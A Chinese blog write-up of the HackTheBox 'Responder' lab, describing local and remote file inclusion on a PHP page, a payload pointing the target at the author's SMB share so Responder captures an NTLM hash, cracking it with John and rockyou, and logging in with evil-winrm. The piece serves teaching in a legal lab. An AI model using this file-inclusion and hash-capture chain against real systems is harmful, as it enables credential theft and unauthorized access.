【HTB】Responder思路——Responder抓取ntlmhash、远程文件包含、远程代码执行、evil-winrm连接

文章讲述了作者在HTB靶场中使用Responder工具解析目标IP,通过修改hosts文件访问并测试了文件包含漏洞。利用远程文件包含,捕获NTLMhash并使用字典破解获取账号密码,最终使用evil-winrm工具成功连接靶机并找到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

接下来一段时间会做关于HTB的靶场内容,很遗憾我到现在才知道这个好东西,相见恨晚,如果我能早一些用这个靶场磨练自己的技术,或者现在要提升一大截,这次是Responder靶场的解析和思路,这个靶场确实比其他的starting-point靶场要更难一些,也学到了很多东西。

responder

解析目标ip:10.129.164.199

无法进行访问

通过修改/etc/hosts:10.129.164.199 unika.htb 映射访问成功

在这里插入图片描述

在我们打开它进行测试功能点,发现修改语言后他进行了reload加载,看到上方出现了访问。

本关前文提过了文件包含漏洞,所以我们可以进行测试

在这里插入图片描述

测试文件包含前面可以加一堆…/因为你不会因为…/太多而掉出根目录,通过第一次的报错信息,能知道这是windows系统,通过固定文件来访问hosts文件,确定存在漏洞。本地文件包含。

在这里插入图片描述

index.php?page=//10.10.14.102/testShare

通过nmap我们之前扫出过很多端口,有tcp端口。

我们测试是否存在远程文件包含,打开responder捕获smb信息,通过让他来访问我们来获取NTLMhash
在这里插入图片描述
访问共享。
在这里插入图片描述
在这里插入图片描述

捕获到NTLM hash接下来进行破解。

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

利用这条命令解压rockyou这个文件,里面是一些常用爆破字典。

在这里插入图片描述
利用john的破解工具来跑刚才的hash

发现爆出了 账号名和他的对应hash密码

然后我们使用evil-winrm工具指定ip,账号密码进行连接。可以看到连接成功。
在这里插入图片描述
在这里插入图片描述

我们在机器中找flag可以看到在mike这个文件夹中。

总结

本次知识点responder抓取NTLM hash,远程文件包含,本地文件包含,远程代码执行。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

webfker from 0 to 1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值